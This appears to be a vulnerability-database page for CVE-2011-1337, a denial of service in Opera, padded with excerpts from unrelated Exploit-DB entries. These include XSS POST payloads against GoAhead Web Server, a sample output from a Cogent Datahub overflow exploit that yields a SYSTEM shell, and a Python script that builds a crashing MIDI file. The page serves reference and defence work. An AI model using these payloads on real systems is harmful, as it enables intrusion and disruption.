CVE-2011-1337
published 2011-07-01CVE-2011-1337: Opera before 11.50 allows remote attackers to cause a denial of service (disk consumption) via invalid URLs that trigger creation of error pages.
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNINAP
EPSS
2.59%
83.4th percentile
Opera before 11.50 allows remote attackers to cause a denial of service (disk consumption) via invalid URLs that trigger creation of error pages.
Affected
78 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| opera | opera_browser | <= 11.50 | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
| opera | opera_browser | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting
exploitdb·2011-10-10
CVE-2011-4273 GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting
GoAhead Web Server 2.18 - 'addlimit.asp?url' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/50039/info
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected.
POST /goform/AddAccessLimit HTTP/1.1
url=alert(1337)&group=test&method=3&ok=OK
Exploit-DB
GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting
exploitdb·2011-10-10
CVE-2011-4273 GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting
GoAhead Web Server 2.18 - 'addgroup.asp?group' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/50039/info
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected.
POST /goform/AddGroup HTTP/1.1
group=alert(1337)&privilege=4&method=1&enabled=on&ok=OK
Exploit-DB
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
exploitdb·2011-09-22
CVE-2011-3493 Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
Cogent Datahub 7.1.1.63 - Remote Unicode Buffer Overflow
---
#!/usr/bin/python
#
# Cogent Datahub > @net__ninja || @luigi_auriemma
# example usage:
# [mr_me@neptune cognet]$ ./cognet_overflow.py 192.168.114.130
#
# -----------------------------------------------------
# ------ Cogent Datahub Unicode Overflow Exploit ------
# ------------- Found by Luigi Auriemma ---------------
# --------- SYSTEM exploit by Steven Seeley -----------
#
# (+) Sending overflow...
# (+) Getting shell..
# Connection to 192.168.114.130 1337 port [tcp/menandmice-dns] succeeded!
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaster>whoami
# whoami
# nt authority\system
#
# C:\Program Files\Cogent\Cogent DataHub\plugin\TCPMaste
Exploit-DB
Music Animation Machine MIDI Player - Local Crash (PoC)
exploitdb·2011-01-03
CVE-2011-0502 Music Animation Machine MIDI Player - Local Crash (PoC)
Music Animation Machine MIDI Player - Local Crash (PoC)
---
# Exploit Title: Music Animation Machine MIDI Player Local Crash PoC
# Date: 1/3/2011
# Author: c0d3R'Z
# Software Link: http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
# Version: Release 035
# Tested on: Windows XP SP2 EN (VirtualBox)
# The application crashes when trys to convert a malformed midi file
#!/usr/bin/python
buffer = "\x31\x33\x33\x37" * 1337
try:
f = open("test.mid",'w')
f.write(buffer)
f.close()
print " Vulnerable file created!..."
print " Open the mid file with the application and Voila!! , it crashes!!\n"
except:
print "[-] Error occured!"
No writeups or analysis indexed.
http://jvn.jp/en/jp/JVN47757122/index.htmlhttp://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-000049.htmlhttp://secunia.com/advisories/45060http://www.opera.com/docs/changelogs/mac/1150/http://www.opera.com/docs/changelogs/unix/1150/http://www.opera.com/docs/changelogs/windows/1150/http://www.opera.com/support/kb/view/996/http://www.osvdb.org/73486http://www.securityfocus.com/bid/48501https://exchange.xforce.ibmcloud.com/vulnerabilities/68323http://jvn.jp/en/jp/JVN47757122/index.htmlhttp://jvndb.jvn.jp/ja/contents/2011/JVNDB-2011-000049.htmlhttp://secunia.com/advisories/45060http://www.opera.com/docs/changelogs/mac/1150/http://www.opera.com/docs/changelogs/unix/1150/http://www.opera.com/docs/changelogs/windows/1150/http://www.opera.com/support/kb/view/996/http://www.osvdb.org/73486http://www.securityfocus.com/bid/48501https://exchange.xforce.ibmcloud.com/vulnerabilities/68323
2011-07-01
Published